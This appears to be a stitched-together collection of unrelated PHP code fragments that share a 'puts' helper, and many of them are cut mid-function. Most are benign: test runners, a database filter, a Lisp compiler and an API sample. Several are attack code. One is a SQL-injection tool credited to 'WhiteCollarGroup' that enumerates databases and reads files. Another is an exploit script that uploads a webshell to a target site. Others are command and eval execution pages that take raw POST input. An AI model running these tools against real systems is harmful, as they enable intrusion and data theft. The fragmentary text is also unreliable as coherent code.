function processDatabases() { $confPath = __DIR__.'/../conf'; $confs = findConfigurationFiles($confPath); foreach ($confs as $confFile) { $conf = json_decode(file_get_contents($confPath.'/'.$confFile)); if (!$conf) puts("Not a valid json file:\n".file_get_contents($confFile)); else { $filter = new DataFilter($conf); $filter->processDatabase(); } } }
function main($msg = null) { global $token, $token_hex; echo "\n" . $msg . "\n"; puts("[>] MAIN MENU"); puts("[1] Browse MySQL"); puts("[2] Run SQL Query"); puts("[3] Read file"); puts("[4] About"); puts("[0] Exit"); $resp = gets(); if ($resp == "0") { exit; } elseif ($resp == "1") { // pega dbs $i = 0; puts("[.] Getting databases:"); while (true) { $pega = runquery("SELECT schema_name FROM information_schema.schemata LIMIT {$i},1"); if ($pega) { puts(" - " . $pega); } else { break; } $i++; } puts("[!] Current database: " . runquery("SELECT database()")); puts("[?] Enter database name for select:"); $own = array(); $own['db'] = gets(); $own['dbh'] = hex($own['db']); // pega tables da db $i = 0; puts("[.] Getting tables from {$own['db']}:"); while (true) { $pega = runquery("SELECT table_name FROM information_schema.tables WHERE table_schema={$own['dbh']} LIMIT {$i},1"); if ($pega) { puts(" - " . $pega); } else { break; } $i++; } puts("[?] Enter table name for select:"); $own['tb'] = gets(); $own['tbh'] = hex($own['tb']); // pega colunas da table $i = 0; puts("[.] Getting columns from {$own['db']}.{$own['tb']}:"); while (true) { $pega = runquery("SELECT column_name FROM information_schema.columns WHERE table_schema={$own['dbh']} AND table_name={$own['tbh']} LIMIT {$i},1"); if ($pega) { puts(" - " . $pega); } else { break; } $i++; } puts("[?] Enter columns name, separated by commas (\",\") for select:"); $own['cl'] = explode(",", gets()); // pega dados das colunas foreach ($own['cl'] as $coluna) { $i = 0; puts("[=] Column: {$coluna}"); while (true) { $pega = runquery("SELECT {$coluna} FROM {$own['db']}.{$own['tb']} LIMIT {$i},1"); if ($pega) { puts(" - {$pega}"); $i++; } else { break; } } echo "\n[ ] -+-\n"; } main(); } elseif ($resp == "2") { puts("[~] RUN SQL QUERY"); puts("[!] You can run a SQL code. It can returns a one-line and one-column content. You can also use concat() or group_concat()."); puts("[?] Query (enter for exit): "); $query = gets(); if (!$query) { main(); } else { main(runquery($query . "\n")); } } elseif ($resp == "3") { puts("[?] File path (may not have priv):"); $file = hex(gets()); $le = runquery("SELECT load_file({$file}) AS wc"); if ($le) { main($le); } else { main("File not found, empty or no priv!"); } } elseif ($resp == "4") { puts("Coded by WhiteCollarGroup"); puts(""); puts("*****@*****.**"); puts(""); puts(""); puts(""); main(); } else { main("[!] Wrong choice."); } }
exit; } } else { //you had a valid login // get TA ID and name for the entire session. $sql = "select sid from login where username = '******' and password = '******'"; $result = $db->query($sql)->fetch(); $_SESSION['ta_id'] = $result[0]; $sql = "select name_first, name_last, department from ta where sid = '{$result['0']}'"; $result = $db->query($sql)->fetch(); $_SESSION['ta_name'] = $result['name_first'] . " " . $result['name_last']; $_SESSION['tadept'] = $result['department']; // go to next page. session_regenerate_id(true); session_write_close(); header("Location:info.php"); exit; } } catch (PDOException $e) { puts('Exception : ' . $e->getMessage()); $db = NULL; } } } } //check user creds ?> </html>
<?php def_printfer('puts', "%s\n"); puts('base>'); _catch("first", function () { puts('1>'); _catch("second", function () { puts('2>'); _catch("third", function () { puts('3>'); _throw("second"); puts('<3'); }); puts('<2'); }); puts('<1'); }); puts('<base'); ?> --- base> 1> 2> 3> <1 <base
private function processTable($name) { puts("-----"); puts("Processing table: $name"); $stm = $this->source->execute("select * from $name"); $count = $stm->rowCount(); puts("Row count: $count"); if($this->truncateTable($this->dest, $name)) puts("Truncated destination table."); else puts("An error occured truncating destination table."); $strCols = $this->getColumnNames($stm, 'VAR_STRING', 'BLOB', 'TEXT'); $allCols = $this->getColumnNames($stm); puts("Table columns: ".implode(', ', $allCols)); puts("Filtered columns: ".implode(', ', $strCols)); $insertStm = $this->prepareInsertStatement($this->dest, $name, $allCols); for ($i=0; $i<$count; $i++) { // for ($i=0; $i<min($count, 10); $i++) { echo '- '; $row = $stm->fetch(PDO::FETCH_BOTH); echo $row[0]; echo ' | '; foreach ($strCols as $colname) { $row[$colname] = $this->filterValue($row[$colname]); echo substr($row[$colname], 0, 10); echo ' | '; } // puts(implode(', ', $this->getRowValues($row, $allCols))); if (!$insertStm->execute($this->getRowValues($row, $allCols))) throw new Exception('Unable to insert row: '.json_encode($row)); puts (' ;'); } puts("All rows inserted."); }
putenv("PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin"); putenv("SCRIPT_FILENAME=" . strtok($_POST['txtCommand'], " ")); /* PHP scripts */ $ph = popen($_POST['txtCommand'] . ' 2>&1', "r"); while ($line = fgets($ph)) { echo htmlspecialchars($line); } pclose($ph); puts(" </pre>"); } if (!isBlank($_POST['txtPHPCommand'])) { puts("<pre>"); require_once ""; require_once ""; echo eval($_POST['txtPHPCommand']); puts(" </pre>"); } ?> <div id="niftyOutter"> <form action="exec.php" method="post" enctype="multipart/form-data" name="frmExecPlus" onsubmit="return frmExecPlus_onSubmit(this);"> <table summary="exec"> <tr> <td colspan="2" valign="top" class="vnsepcell"><?php echo gettext("Execute Shell command"); ?> </td> </tr> <tr> <td class="label" align="right"><?php echo gettext("Command"); ?>
function try_again($str, $str2, $str3) { puts(""); //reset the modal login_form($str, $str2, $str3); }
$prefix = file_get_contents($dir . 'prefix'); } if (file_exists($dir . 'suffix')) { $suffix = file_get_contents($dir . 'suffix'); } foreach (test_files($dir) as $file) { $total++; list($src, $result) = read_test($file); $result = trim($result); $eval_out = trim(eval_output($prefix . $src . $suffix)); if ($eval_out == $result) { $correct++; echo '.'; } else { add_error($file, $eval_out, $result); $fail++; echo 'e'; } } } print_all_errors(); if ($fail) { Color::red(); } else { Color::green(); } puts("Correct: " . $correct); puts("Fail: " . $fail); puts("Total: " . $total); Color::reset(); unlink('tmp.php');
function red($text, $line_break = true) { puts($text, RED, $line_break); }
/** * Show a nice list of statistics such as the amount of requirements, failed tests, etc. * * @author Yorick Peterse * @access Private * @static * @return Void */ private static function show_statistics() { $tests = Colors::blue("Tests: " . self::$statistics['tests']); $failed = Colors::red("Failed: " . self::$statistics['tests_failed']); $success = Colors::green("Success: " . (self::$statistics['tests'] - self::$statistics['tests_failed'])); $reqs = "Requirements: " . self::$statistics['requirements']; puts(PHP_EOL . "{$reqs} | {$tests} | {$success} | {$failed}"); }
} elseif ($c == "'" || $c == '"') { // start of quoted string? $quoted = TRUE; $quote = $c; $line .= $c; $slash = FALSE; } else { $line .= $c; } } } } } } if (!empty($line)) { puts(trim($line) . "\n"); $line = ''; } exit(0); function getchar() { return fgetc(STDIN); } function puts($s) { return fwrite(STDOUT, $s, strlen($s)); } function debug($s) { return; fwrite(STDERR, $s, strlen($s));
function to_code($ast, $t = '-') { if (D) { puts($t . 'AST:', $ast); } if (is_array($ast) && count($ast) == 1 && !$this->get_method(pos($ast))) { $ast = pos($ast); } //IS IT AN ATOM? if (!is_array($ast)) { //is it a float or negative number? $f = str_replace(array('__DOT', '__DSH'), array('.', '-'), $ast); if (is_numeric($f)) { return $f; } return $this->get_var($ast) && !is_numeric($ast) ? '$' . $ast : $ast; } //IS IT A SINGLE LIST? if (!is_array(pos($ast))) { $ast = array($ast); } //CREATE PARSED AST $code = array(); $special_forms = array('__quote', 'lambda', 'define', 'cond', 'if', 'and', 'or', 'not', 'iapply'); foreach ($ast as $node) { if (D) { puts(N, $t . 'CHECK:', $node, N); } $method = array_shift($node); if (in_array($method, $special_forms)) { $args = $node; $method = '__' . $method; } else { $args = array(); foreach ((array) $node as $arg) { $args[] = $this->to_code($arg); } if (D) { puts('BLIND', $args); } } $code[] = $this->{$method}(empty($args) ? NULL : $args); } return count($code) == 1 ? array_shift($code) : $code; }
curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL, $target . "/admin/main.php?pg=filetypes"); curl_setopt($ch, CURLOPT_POSTFIELDS, "task=addfiletype&file_type=hack"); curl_exec($ch); // get doc type id puts("Trying to get new doc type ID."); curl_setopt($ch, CURLOPT_POST, 0); curl_setopt($ch, CURLOPT_URL, $target . "/admin/main.php?pg=filetypes"); $store = curl_exec($ch); $numbers = array(); preg_match_all("/main\\.php\\?pg=filetypes&task=deltype&type_id=([0-9]*)/", $store, $numbers); $tid = $numbers[1][0]; puts("New doc type ID: {$tid}", "[!]"); // upload file puts("Trying to upload file..."); curl_setopt($ch, CURLOPT_POST, 1); $post = array("task" => "addfile", "client_id" => $uid, "from" => "step1", "project_id" => $pid, "clid" => $uid, "task_id" => $taskid, "type_id" => $tid, "file_title" => "wcgroup", "file" => "@{$webshell}"); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_exec($ch); // make file address puts("Thinking about file address..."); $fileaddr = $target . "/clientdir/{$uid}/dl/" . basename($webshell); puts("Exploit complete.", "[!]"); puts("You have now a webshell in <{$fileaddr}>", "[i]"); function puts($str, $type = false) { if (!$type) { $type = "[*]"; } echo $type . " " . $str . "\n"; }
print 'neutral'; } } //value == 50 print '"><td>' . $p->ta . '</td></tr>'; } //don't print out blanks } //print out each TA print '</tbody></table>'; } //when we have a match, display the results. } //getting rows from pref.csv fclose($fp); } else { puts($status); } } ?> <script> function redirectMe (sel) { var url = sel[sel.selectedIndex].value; window.location = url; } </script> </body></html>
puts("<div class=\"panel panel-success responsive\"><div class=\"panel-heading\"><h2 class=\"panel-title\">PHP Response</h2></div>"); $tmpname = tempnam("/tmp", ""); $phpfile = fopen($tmpname, "w"); fwrite($phpfile, "<?php\n"); fwrite($phpfile, "require_once(\"/etc/inc/\");\n"); fwrite($phpfile, "require_once(\"/etc/inc/\");\n\n"); fwrite($phpfile, $_POST['txtPHPCommand'] . "\n"); fwrite($phpfile, "?>\n"); fclose($phpfile); $output = array(); exec("/usr/local/bin/php " . $tmpname, $output); unlink($tmpname); $output = implode("\n", $output); print "<pre>" . htmlspecialchars($output) . "</pre>"; // echo eval($_POST['txtPHPCommand']); puts("</div>"); ?> <script type="text/javascript"> //<![CDATA[ events.push(function() { // Scroll to the bottom of the page to more easily see the results of a PHP exec command $("html, body").animate({ scrollTop: $(document).height() }, 1000); }); //]]> </script> <?php } ?> <div class="panel panel-default responsive"> <div class="panel-heading"><h2 class="panel-title"><?php echo gettext('Execute PHP Commands');
<?php require_once "plivo.php"; $auth_id = "Your AUTH_ID"; $auth_token = "Your AUTH_TOKEN"; $p = new RestAPI($auth_id, $auth_token); # API ID is returned for every API request. # Request UUID is request id of the call. This ID is returned as soon as the call is fired irrespective of whether the call is answered or not $params = array('to' => '2222222222', 'from' => '1111111111', 'answer_url' => "", 'answer_method' => "GET"); # Make an outbound call $response = $p->make_call($params); puts("API ID : #{$response['api_id']}"); puts("Request UUID : #{$response['request_uuid']}"); /* Sample Output API ID : 32cba792-ae01-11e4-b153-22000abcaa64 Request UUID : 5b2db3d3-f478-4b63-992c-e47c527572e8 */ # Call UUID is th id of a live call. This ID is returned only after the call is answered. $params1 = array('status' => 'live'); # Get the details of all live calls $response = $p->get_live_calls($params1); $uuids = $response['response']['calls']; // Looping through the call uuids foreach ($uuids as $value) { print_r("Call UUID : {$value} <br>"); } /* Sample Output Call UUID : a60f44dc-926f-11e4-82f5-b559cbfe39b9 Call UUID : af399206-926f-11e4-8b6f-fd067af138be
putenv("PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin"); putenv("SCRIPT_FILENAME=" . strtok($_POST['txtCommand'], " ")); /* PHP scripts */ $ph = popen($_POST['txtCommand'], "r"); while ($line = fgets($ph)) { echo htmlspecialchars($line); } pclose($ph); puts("</pre>"); } if (!isBlank($_POST['txtPHPCommand'])) { puts("<pre>"); require_once ""; require_once ""; echo eval($_POST['txtPHPCommand']); puts("</pre>"); } ?> <div id="niftyOutter"> <form action="exec.php" method="POST" enctype="multipart/form-data" name="frmExecPlus" onSubmit="return frmExecPlus_onSubmit( this );"> <table> <tr> <td colspan="2" valign="top" class="vnsepcell">Bir kabuk komutu çalıştır</td> </tr> <tr> <td class="label" align="right">Komut:</td> <td class="type"><input id="txtCommand" name="txtCommand" type="text" size="80" value="<?php echo htmlspecialchars($_POST['txtCommand']); ?> "></td> </tr>
def('say_two', function () { puts("Me: two"); }); say_two(); // Me: two def_alias('say_one', 'say_two'); say_two(); // Me: one //////////////////////////////////////// def_printfer('test_let', "calling outside let \n"); test_let(); // calling outside let deflet(function () { def_printfer('test_let', "calling inside let \n"); test_let(); // calling inside let }); test_let(); // calling outside let //////////////////////////////////////// # using namespace def('foo\\bar\\hello', function () { echo "Hello, World!\n"; }); foo\bar\hello(); // Hello, World! //////////////////////////////////////// # Testing def_return def_return('user_name', 'waserd'); puts(user_name()); // waserd